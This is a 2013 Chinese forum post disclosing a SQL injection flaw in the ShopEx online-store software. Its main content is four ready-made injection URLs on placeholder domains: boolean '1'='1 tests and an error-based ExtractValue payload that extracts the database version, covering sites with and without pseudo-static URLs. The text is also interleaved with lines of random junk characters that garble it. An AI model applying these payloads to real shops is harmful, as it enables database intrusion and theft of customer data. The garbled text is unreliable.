注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
2 I' v- C1 e: ], i4 G( Q& Q6 W% u8 B& E9 D$ k4 y& g) p
好吧,我扯远了~~
T/ j4 I1 R# q/ h$ ?其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~- `* M+ T8 y- N2 k% v) o
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 2 a1 A {8 d6 H8 A8 _9 j3 [
' T( `" Y- D5 n+ A- U
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
0 K; B, Q- U. {. t0 [8 @6 ^& F3 G' n* R: [ C0 T6 R+ ^
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html ! c3 Z0 U( @/ d8 ^7 `: B! k
# W, O; X% m' s. A, B' q& dhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
; x# a' J2 a" n; M* F+ R! f1 L- l, q1 ^/ a% \
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
8 ~8 ?( W- @4 n7 ~8 u% |
: s$ s8 p: g( a& O5 R5 i* S, x
* a2 p! N" y$ o+ C4 D一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。+ j2 b( C: |; N" ^. X% ?
如何注入就不多说了,10多年的东西了…不会也会了…
8 W* ?. @: w, I$ `. g i7 W6 e2 H8 P8 |
+ c X- J6 r* R+ S! O. _: F& \% y8 \, w* f
- E9 ?0 Z+ P! N
|
发表于 2013-2-19 08:31:27
收藏
支持
反对